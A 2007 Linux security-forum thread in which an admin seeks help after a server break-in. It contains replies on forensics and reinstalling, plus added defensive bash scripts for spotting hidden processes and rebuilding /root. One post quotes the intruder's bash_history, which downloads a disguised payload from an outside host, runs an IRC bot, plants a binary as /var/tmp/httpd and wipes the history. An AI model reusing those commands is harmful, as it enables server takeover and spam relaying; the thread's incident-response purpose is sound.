LinuxQuestions.org
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Security
Old 03-20-2007, 04:33 AM   #1
y2pk001
LQ Newbie
 
Registered: Nov 2006
Posts: 4

Rep: Reputation: 0
Root user bash shell look like "bash-2.05b#" and /root empty


Hi there

Please help me..anyone

My server was attacked by a script kiddie and the little bastard loaded a script which ran from the /tmp dir. I managed to delete everything and the server seems to be fine, but after my last restart I connected using ssh/root and my prompt appeared like "bash-2.05b#". I then did a directory listing in the root dir and found it to be empty?

Whats going on?

Has this box been seriously compromised and am I too stupid to realise?

Any help or suggestions, thanks

PS If this post is in the wrong place, oops sorry
 
Old 03-20-2007, 06:20 AM   #2
Capt_Caveman
Senior Member
 
Registered: Mar 2003
Distribution: Fedora
Posts: 3,658

Rep: Reputation: 69
Quote:
Originally Posted by y2pk001
after my last restart I connected using ssh/root and my prompt appeared like "bash-2.05b#". I then did a directory listing in the root dir and found it to be empty?
But if you login locally (physically login to the system) is the root filesystem there?

In the meantime, I would highly recommend downloading rkhunter or chkrootkit and scanning the system. Also, do you have any idea of how the system was compromised, any of the files that were on the system, or what commands were executed (e.g. bash history)?
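The rootkit scanners recommended above work largely by cross-checking what one interface reports against another. Below is an added example, not code from the thread or from rkhunter/chkrootkit, of one such check in miniature: a trojaned ps or a kernel rootkit can hide a process from ps, but /proc still has a numeric directory for every PID. The sample PID lists used when testing the helper are constructed; the live scan needs Linux /proc.

```bash
#!/bin/bash
# Added example: compare the PIDs that ps reports with the directories in
# /proc. Disagreement is what chkrootkit and unhide look for; this is a
# stripped-down version written for this thread, not their code.

# hidden_entries ACTUAL_FILE LISTED_FILE
# Print entries present in ACTUAL_FILE but absent from LISTED_FILE.
# One entry per line in each file; order does not matter.
hidden_entries() {
    local actual="$1" listed="$2" a l
    a=$(mktemp) && l=$(mktemp) || return 2
    sort -u "$actual" >"$a"
    sort -u "$listed" >"$l"
    comm -23 "$a" "$l"        # lines only in ACTUAL
    rm -f "$a" "$l"
}

# scan_hidden_pids
# PIDs visible as /proc/<pid> but missing from `ps -e`. Processes that exit
# between the two snapshots produce false positives, so run it twice and
# only trust PIDs that appear both times.
scan_hidden_pids() {
    local from_ps from_proc
    from_ps=$(mktemp) && from_proc=$(mktemp) || return 2
    ps -eo pid= | tr -d ' ' >"$from_ps"
    ls /proc | grep -E '^[0-9]+$' >"$from_proc"
    hidden_entries "$from_proc" "$from_ps"
    rm -f "$from_ps" "$from_proc"
}

# Run with --scan on the suspect box. Because ps, ls and comm themselves may
# be trojaned, a clean result is only meaningful when the binaries come from
# trusted media (a mounted rescue CD), which is why a local boot was asked for.
if [ "${1:-}" = "--scan" ]; then
    for pid in $(scan_hidden_pids); do
        printf 'pid %s is in /proc but not in ps\n' "$pid"
    done
fi
```

The same diff-two-views idea applies to files: compare `ls -la` of a directory with `find` or with a listing taken from a rescue boot, since a rootkit that hides its own files usually patches only one path.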
 
Old 03-20-2007, 09:57 AM   #3
y2pk001
LQ Newbie
 
Registered: Nov 2006
Posts: 4

Original Poster
Rep: Reputation: 0
Thanks for your response

I am unable to log onto the machine locally, it lives on the other side of the world from me. I will ask the ISP guys to have a look.

I have run all the tools you spoke of and everything checks out fine.
Here is the bash_history:

keru.100free.com/all.jpg
tar xzvf all.jpg
rm -rf all.jpg
cd all
cd acy
./acycmech-linux 3 "#sex123456" - *\!*@supr3mul.users.undernet.org
cd ..
cp linux /var/tmp/httpd
/var/tmp/httpd
cat /proc/cpuinfo
cd ~
ls -a
echo > .bash_history


All I did was delete the user, and I found a funny process running in the /tmp dir. I deleted everything in /tmp and killed the process.

What that process was doing was sending email (spam) that looked like it was coming from ebay.com; that stopped.

What else should I do??

Thanks a million
 
Old 03-20-2007, 08:04 PM   #4
Capt_Caveman
Senior Member
 
Registered: Mar 2003
Distribution: Fedora
Posts: 3,658

Rep: Reputation: 69
Quote:
All I did was delete the user
So a new user was created on the system?

Quote:
and I found a funny process running in the /tmp dir
From the bash_history, it looks like there might be stuff in /var/tmp as well. Note that the bash_history is likely incomplete (you can see him try and wipe it with the last command). What user was this bash_history from?

Frankly, this looks very suspect, and I would rebuild this box from trusted media. The fact that you do not have physical access to this box is going to make doing any kind of forensic analysis difficult. Normally I would tell you to power the box down and boot using a CD-ROM based distro like Knoppix, mount the compromised system and see if the filesystem is intact. However that isn't really an option here it seems. The odd bash prompt and missing filesystem is concerning, especially since the system is still running and is able to authenticate you to a non-existent /etc/passwd.
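The posted history shows the classic pattern: a dropper unpacked in a scratch directory, a binary copied to /var/tmp/httpd (named to look like the web server) and executed from there. As an added example, not part of the thread, here is a small triage script for that pattern: it flags any running process whose executable lives in a world-writable scratch directory or has been deleted from disk after launch, and lists executables left behind in those directories. The directory list is an assumption; the sample paths in the usage comments are constructed. The live scan needs Linux /proc and GNU find.

```bash
#!/bin/bash
# Added example: find processes launched from scratch directories and the
# files they left behind. Assumed scratch directories:
SCRATCH_DIRS="/tmp /var/tmp /dev/shm"

# suspicious_exe PATH
# Exit 0 when PATH is under a scratch directory, or when the kernel reports
# the binary as " (deleted)" (unlinked after launch, a common trick to hide
# the dropper while keeping the process), else exit 1.
suspicious_exe() {
    local exe="$1" dir
    case "$exe" in
        *" (deleted)") return 0 ;;
    esac
    for dir in $SCRATCH_DIRS; do
        case "$exe" in
            "$dir"/*) return 0 ;;
        esac
    done
    return 1
}

# scan_running: walk /proc and print PID, executable and command line for
# every process suspicious_exe flags. Entries we cannot read are skipped.
scan_running() {
    local p pid exe
    for p in /proc/[0-9]*; do
        pid=${p#/proc/}
        exe=$(readlink "$p/exe" 2>/dev/null) || continue
        if suspicious_exe "$exe"; then
            printf 'pid=%s exe=%s cmd=%s\n' "$pid" "$exe" \
                "$(tr '\0' ' ' <"$p/cmdline" 2>/dev/null)"
        fi
    done
}

# scan_dropped: executables lying in scratch directories, newest first,
# with mtime and owner so they can be tied to the compromised account.
scan_dropped() {
    local dir
    for dir in $SCRATCH_DIRS; do
        [ -d "$dir" ] || continue
        find "$dir" -xdev -type f -perm -u+x -printf '%T@ %u %p\n' 2>/dev/null
    done | sort -rn
}

# Usage on the suspect box:  ./triage.sh --scan
# Expected flags for the history above (constructed): exe=/var/tmp/httpd
if [ "${1:-}" = "--scan" ]; then
    echo "# processes running from scratch directories"; scan_running
    echo "# executables lying in scratch directories"; scan_dropped
fi
```

Copy anything it finds elsewhere with `cp -a` (or better, image the disk from a rescue boot) before killing or deleting it; once /var/tmp/httpd is gone, so is the evidence of what it was connecting to and for whom it was relaying mail.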
 
Old 03-22-2007, 03:13 AM   #5
y2pk001
LQ Newbie
 
Registered: Nov 2006
Posts: 4

Original Poster
Rep: Reputation: 0
The user existed but was created with /bin/bash and a VERY weak password (not by me, by my incompetent colleague); it was for a client who wanted POP3/IMAP email.

I have a feeling that in my panic I might have typed:

rm -Rf /root

What would have happen if I was stupid enough to do that?

A re-install will be a bit difficult. With the current political environment within my office it will almost certainly mean a move to Microsoft Windows, which will almost certainly result in my resignation. So I sort of need to try and fix this mess on the hush hush.

Again, thanks a lot for your help
 
Old 03-22-2007, 04:20 AM   #6
Fadoksi
Member
 
Registered: Apr 2006
Location: Finland
Distribution: Ubuntu, Gentoo, Debian
Posts: 88

Rep: Reputation: 15
If you can be 101+% sure the root isn't compromised and there are no backdoors etc. kiddie stuff on the server I think you can restore your server's normal run, after deleting/upgrading the vulnerable software you have on the server. But I wouldn't trust that machine in that situation. I would reinstall.

Last edited by Fadoksi; 03-22-2007 at 04:22 AM.
 
Old 03-22-2007, 08:33 PM   #7
Capt_Caveman
Senior Member
 
Registered: Mar 2003
Distribution: Fedora
Posts: 3,658

Rep: Reputation: 69
Quote:
Originally Posted by y2pk001
I have a feeling that in my panic I might have typed:
rm -Rf /root
What would have happen if I was stupid enough to do that?
It would just delete root's home filesystem, in which case you would likely have effects like you're experiencing, like the odd bash prompt because the .bashrc and user-specific config files are all missing. It's really important to be certain that *you* did that and not the intruder. If the intruder was able to delete files owned by root, then they had administrative access and you are hosed: they could have basically done anything, including installing malicious kernel modules or even replacing the kernel itself with a version that happily reports everything is OK and does other nasty things like neglecting to show any files owned by the intruder when using system commands like ls. So it is very important to be sure of this.

Quote:
Originally Posted by y2pk001
A re-install will be abit diffcult, with the current political enviroment within my office it will almost certainly mean a move to Mircosoft Windows which will alomost certainly result in my resignation. So i sort need to try and fix this mess on the hush hush.
Frankly I think you should reinstall and deal with the consequences, but I'm not you and I can't pretend to know what kind of position you are in, so I'll leave it at that.

If you just hosed /root with rm -rf /root, then you can likely just rebuild that part of the filesystem. There should be copies of the standard user-specific config files in /etc/skel/. You can copy these over to /root and make sure the permissions and ownership are ok.
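The bare "bash-2.05b#" prompt is exactly what bash's built-in default PS1 (`\s-\v\$`) looks like when nothing sets PS1, which is what happens once ~/.bashrc and ~/.bash_profile are gone. As an added example, not from the thread, here is the rebuild from /etc/skel described above, with a check for the symptom and the ownership/mode tightening the reply asks for. The home and skeleton directories are parameters so the functions can be tried against a scratch directory first; the 0700/0600 modes are this example's choice (a common default for /root), so match your distribution's packaging if it differs.

```bash
#!/bin/bash
# Added example: rebuild a wiped root home from /etc/skel and verify it.

# home_needs_rebuild HOME_DIR
# Exit 0 if HOME_DIR is missing or holds none of the usual shell startup
# files (the state that yields the default "bash-X.Y#" prompt), else 1.
home_needs_rebuild() {
    local home="$1" f
    [ -d "$home" ] || return 0
    for f in .bashrc .bash_profile .profile; do
        [ -e "$home/$f" ] && return 1
    done
    return 0
}

# rebuild_home HOME_DIR SKEL_DIR [OWNER]
# Copy skeleton files into HOME_DIR without clobbering anything that
# survived, then tighten modes: 0700 on directories, 0600 on files, so no
# other account can read root's dotfiles or plant startup code in them.
# chown is only attempted when running as root (assumed owner: root).
rebuild_home() {
    local home="$1" skel="$2" owner="${3:-root}" f
    mkdir -p "$home" || return 1
    for f in "$skel"/.[!.]* "$skel"/*; do
        [ -e "$f" ] || continue                 # unmatched glob
        [ -e "$home/${f##*/}" ] && continue     # keep survivors
        cp -R "$f" "$home/"
    done
    chmod 700 "$home"
    find "$home" -type d -exec chmod 700 {} +
    find "$home" -type f -exec chmod 600 {} +
    if [ "$(id -u)" = 0 ]; then
        chown -R "$owner:$owner" "$home"
    fi
}

# verify_home HOME_DIR
# Report anything that would still give a bare prompt or leave the
# directory readable by others. Exit 0 when every check passes.
verify_home() {
    local home="$1" ok=0
    home_needs_rebuild "$home" && { echo "no startup files in $home"; ok=1; }
    find "$home" -maxdepth 0 -perm 700 | grep -q . \
        || { echo "$home is not mode 0700"; ok=1; }
    find "$home" -type f ! -perm 600 | grep -q . \
        && { echo "loose file modes under $home"; ok=1; }
    return $ok
}

# Usage on the live box, as root:
#   rebuild_home /root /etc/skel root && verify_home /root
# then open a fresh login shell; the prompt should now come from .bashrc.
```

Before trusting the result, compare the restored dotfiles with the copies in /etc/skel (`diff -r`) and, if the box is kept, re-check them after every login: a modified ~/.bashrc is one of the cheapest persistence mechanisms an intruder with root can leave behind.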
 